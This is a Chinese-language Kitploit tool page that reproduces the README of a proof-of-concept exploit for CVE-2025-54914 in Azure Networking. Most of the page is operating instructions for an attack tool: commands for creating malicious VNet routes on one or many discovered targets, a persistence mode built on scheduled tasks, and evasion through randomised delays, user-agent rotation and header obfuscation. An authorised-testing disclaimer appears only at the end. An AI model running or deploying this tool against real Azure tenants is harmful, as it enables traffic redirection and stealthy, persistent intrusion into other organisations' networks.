Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-54914-PoC — 针对Azure Networking中CVE-2025-54914的利用,创建恶意路由,具备规避、持久化、多目标扫描和报告功能,用于授权安全测试。 | Kitploit
工具/GitHubGitHub/ash1996x/cve-2025-54914-poc
侦察持久化机制漏洞分析漏洞利用IDS/IPS规避渗透测试云安全
GitHubash1996x/cve-2025-54914-poc

CVE-2025-54914-PoC

针对Azure Networking中CVE-2025-54914的利用,创建恶意路由,具备规避、持久化、多目标扫描和报告功能,用于授权安全测试。

查看仓库
44250年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-54914 Azure 路由利用工具

概述

这是 CVE-2025-54914 Azure 网络路由利用工具的改进版本。本版本保留了核心 CVE 功能,同时增加了包括持久化、规避、多目标扫描和错误处理在内的更多特性。

功能特性

核心 CVE 功能

  • 路由创建:在 Azure 虚拟网络中创建恶意路由
  • 路由删除:清除已创建的路由
  • API 兼容性:兼容 Azure 管理 API 2025-09-01
  • 身份认证:支持 Azure CLI 和手动令牌认证

特性

  • 规避技术:随机延迟、用户代理轮换、请求混淆
  • 持久化:计划任务创建、持续监控模式
  • 多目标扫描:并发扫描和利用多个目标
  • 全面报告:包含成功/失败分析的详细报告
  • 错误处理:优雅的失败处理和恢复
  • 配置管理:基于 JSON 的目标配置
  • 目标发现:自动发现易受攻击的资源
  • 风险评估:漏洞分析和风险评分

安装

先决条件

root@kitploit:~
# 安装 Python 依赖
pip install requests

# 安装 Azure CLI(用于身份认证)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

设置

root@kitploit:~
# 赋予脚本可执行权限
chmod +x exploit.py
chmod +x exploit_utils.py

# 使用 Azure 进行身份认证
az login

使用方法

基本用法

单目标利用

root@kitploit:~
# 在单个目标上创建路由
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

# 删除路由
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --route-name "exploit-route-1" \
    --operation delete

多目标利用

root@kitploit:~
# 创建配置文件
python exploit_utils.py discover --output targets.json

# 利用所有目标
python exploit.py --targets-file targets.json --operation create

扫描模式

root@kitploit:~
# 仅扫描目标,不进行利用
python exploit.py --targets-file targets.json --scan-only

持久化模式

root@kitploit:~
# 启用持久化,间隔30分钟
python exploit.py --targets-file targets.json --persistence-mode --interval 30

高级用法

规避与隐蔽

root@kitploit:~
# 自定义延迟范围用于规避
python exploit.py \
    --targets-file targets.json \
    --delay-min 1.0 \
    --delay-max 5.0 \
    --max-workers 5

预演模式

root@kitploit:~
# 测试但不实际利用
python exploit.py --targets-file targets.json --dry-run

详细日志

root@kitploit:~
# 启用调试日志
python exploit.py \
    --targets-file targets.json \
    --log-level DEBUG \
    --log-file exploit.log

配置

目标配置格式

root@kitploit:~
{
  "targets": [
    {
      "subscription_id": "12345678-1234-1234-1234-123456789012",
      "resource_group": "production-rg",
      "vnet_name": "prod-vnet",
      "subnet_name": "prod-subnet",
      "route_name": "exploit-route-1",
      "address_prefix": "10.0.1.0/24",
      "next_hop_type": "VirtualAppliance",
      "next_hop_ip": "10.0.2.5",
      "api_version": "2025-09-01",
      "priority": 1
    }
  ],
  "metadata": {
    "description": "CVE-2025-54914 的目标配置",
    "created": "2025-01-09",
    "version": "1.0"
  }
}

环境变量

root@kitploit:~
# Azure 访问令牌(Azure CLI 的替代方案)
export AZURE_ACCESS_TOKEN="your_token_here"

# 日志级别
export LOG_LEVEL="INFO"

实用脚本

目标发现

root@kitploit:~
# 发现所有可访问的目标
python exploit_utils.py discover --output discovered_targets.json

# 发现特定订阅
python exploit_utils.py discover \
    --subscription-ids "sub1" "sub2" \
    --output targets.json \
    --report discovery_report.txt

配置生成

root@kitploit:~
# 从已发现的目标生成利用配置
python exploit_utils.py config \
    --input discovered_targets.json \
    --output exploit_config.json \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

漏洞分析

root@kitploit:~
# 分析目标以进行风险评估
python exploit_utils.py analyze \
    --input targets.json \
    --output vulnerability_report.txt

安全特性

规避技术

  • 请求时机:请求之间的随机延迟
  • 用户代理轮换:多种浏览器用户代理
  • 头部混淆:真实的 HTTP 头部
  • SSL 验证:正确的证书验证

持久化机制

  • 计划任务:创建 Windows 计划任务
  • 持续模式:长时间运行的持久化
  • 会话管理:跨运行的状态保持
  • 配置持久化:设置保存到磁盘

错误处理

  • 优雅降级:单个失败时继续运行
  • 超时保护:防止请求挂起
  • 信号处理:中断时干净地关闭
  • 资源清理:退出时自动清理

报告

利用报告

  • 操作结果:每个目标的成功/失败情况
  • 时间信息:执行时间戳
  • 错误详情:详细的错误消息
  • 摘要统计:总体成功率

发现报告

  • 目标清单:已发现资源的完整列表
  • 订阅分解:按订阅分组的目标
  • 资源详情:VNet、子网和位置信息

漏洞分析

  • 风险评估:高/中/低风险分类
  • 生产环境指示:识别生产环境
  • 标签分析:基于资源标签的风险评分

最佳实践

操作安全

  1. 使用预演模式:始终先用 --dry-run 测试
  2. 限制范围:从非生产环境开始
  3. 监控日志:检查日志以发现异常行为
  4. 清理:测试后移除已创建的路由

性能优化

  1. 工作线程限制:根据系统容量调整 --max-workers
  2. 延迟调整:通过延迟设置平衡隐蔽性和速度
  3. 批处理:对大规模操作使用目标文件
  4. 资源监控:执行期间监控系统资源

错误恢复

  1. 检查日志:查看错误消息以进行故障排除
  2. 验证权限:确保具有适当的 Azure 权限
  3. 网络连接:验证互联网连接
  4. 令牌有效性:检查 Azure CLI 身份认证状态

故障排除

常见问题

身份认证错误

root@kitploit:~
# 重新进行 Azure 身份认证
az login

# 检查当前帐户
az account show

# 列出可访问的订阅
az account list

权限错误

root@kitploit:~
# 检查所需的权限
az role assignment list --assignee $(az account show --query user.name -o tsv)

网络错误

root@kitploit:~
# 测试连接
curl -I https://management.azure.com

# 检查代理设置
echo $HTTP_PROXY
echo $HTTPS_PROXY

调试模式

root@kitploit:~
# 启用详细日志
python exploit.py --log-level DEBUG --log-file debug.log

# 查看日志文件
tail -f debug.log

法律与道德考量

⚠️ 重要:此工具仅用于授权的安全测试。

  • 需获得授权:仅在你拥有或已获得明确测试许可的系统上使用
  • 遵守法律:确保遵守当地法律法规
  • 负责任的披露:通过适当渠道报告漏洞
  • 教育用途:此工具旨在用于教育和研究目的

许可协议

本项目仅许可用于研究和教育用途。商业用途需获得明确许可。

贡献

  1. Fork 本仓库
  2. 创建功能分支
  3. 进行你的更改
  4. 如有适用,添加测试
  5. 提交 Pull Request

支持

如有问题或疑问:

  1. 查看故障排除部分
  2. 检查日志以获取错误详情
  3. 创建问题并提供详细信息
  4. 附上相关配置和错误消息
下载工具